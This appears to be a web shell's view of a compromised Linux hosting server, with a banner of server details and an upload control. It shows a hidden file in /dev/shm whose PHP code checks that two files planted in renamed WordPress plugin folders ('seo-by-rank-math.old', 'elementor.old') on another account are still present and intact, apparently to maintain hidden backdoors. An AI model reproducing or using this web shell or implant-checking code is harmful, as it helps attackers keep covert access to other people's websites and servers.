SCHWEIS
Server: LiteSpeed
System: Linux server264.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: jesuufbs (4274)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //dev/shm/.pset
<?php   $r = '/home/digijpbm/public_html'; $x = ["/wp-content/plugins/seo-by-rank-math.old/vendor/woocommerce/action-scheduler/classes/schedules/ActionScheduler.NullSchedule.php"=>"bd@@23529648@@1527",
"/wp-content/plugins/elementor.old/assets/js/packages/editor/7.0.php"=>"bd@@21339167@@640"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');